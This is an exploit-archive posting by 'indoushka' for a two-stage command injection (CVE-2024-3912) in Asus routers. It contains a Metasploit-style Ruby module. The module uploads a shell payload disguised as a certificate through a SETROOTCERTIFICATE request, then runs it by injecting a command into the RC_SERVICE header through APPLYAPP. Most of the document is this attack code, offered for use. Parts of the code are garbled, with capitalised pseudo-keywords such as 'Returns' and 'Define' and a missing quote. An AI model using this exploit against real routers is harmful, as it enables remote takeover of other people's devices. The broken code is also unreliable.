## https://sploitus.com/exploit?id=PACKETSTORM:216849
=============================================================================================================================================
| # Title : Asus router MultiโStage Command Injection via SETROOTCERTIFICATE Leading to Remote Command Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://router.asus.com/ |
=============================================================================================================================================
[+] Summary : A multiโstage command injection vulnerability CVE-2024-3912 allows an attacker to achieve remote command execution on a vulnerable device by abusing the SETROOTCERTIFICATE and APPLYAPP HTTP methods.
In the first stage, a malicious shell script is uploaded to the target system disguised as a certificate file through the SETROOTCERTIFICATE request.
The uploaded content is written to the filesystem where it can later be executed. In the second stage, the attacker triggers command execution by injecting
a shell command into the RC_SERVICE header using the APPLYAPP request, which executes the previously uploaded script.
Successful exploitation results in arbitrary command execution with the privileges of the affected service.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Multi-Stage Command Injection Exploit (SETROOTCERTIFICATE)',
'Description' => %q{
This module exploits a multi-stage command injection vulnerability.
Stage 1: Loads a script disguised as a certificate.
Stage 2: Executes the script via RC_SERVICE command injection.
},
'Author' => [ 'indoushka' ],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [ ['Generic Device', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => '2026-03-07'
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL/TLS', true])
]
)
end
def check
print_status("Checking the target's response...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/')
})
Returns CheckCode::Unknown unless res
If res.code == 200
Returns CheckCode::Detected
End
CheckCode::Safe
End
Define exploit
payload_body = <<~XML
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<content>
<key>-----Beginning of private RSA key-----id</key>
<cert><![CDATA[
#!/bin/sh
#{payload.encoded}
]]></cert>
<intermediate_crt>-----Beginning of certificate-----</intermediate_crt>
</content>
XML
print_status("Phase 1: Load payload via SETROOTCERTIFICATE")
res = send_request_cgi({
'method' => 'SETROOTCERTIFICATE',
'uri' => normalize_uri(target_uri.path, '/favicon.ico/'),
'data' => payload_body
}, 20)
unless res
fail_with(Failure::Unreachable, "No response received from target")
end
print_good("Payload complete")
Rex.sleep(1)
print_status("Phase 2: Starting execution via APPLYAPP")
res = send_request_cgi({
'method' => 'APPLYAPP',
uri' => normalize_uri(target_uri.path, '/favicon.ico/'),
'headers' =>
{
'ACTION_MODE' => 'apply',
'SET_NVRAM' => 'aa',
'RC_SERVICE' => '`sh /etc/cert.pem.1`'
}
}, 20)
unless res
fail_with(Failure::Unreachable, "No response received during execution")
end
print_good("Exploitation request sent successfully")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================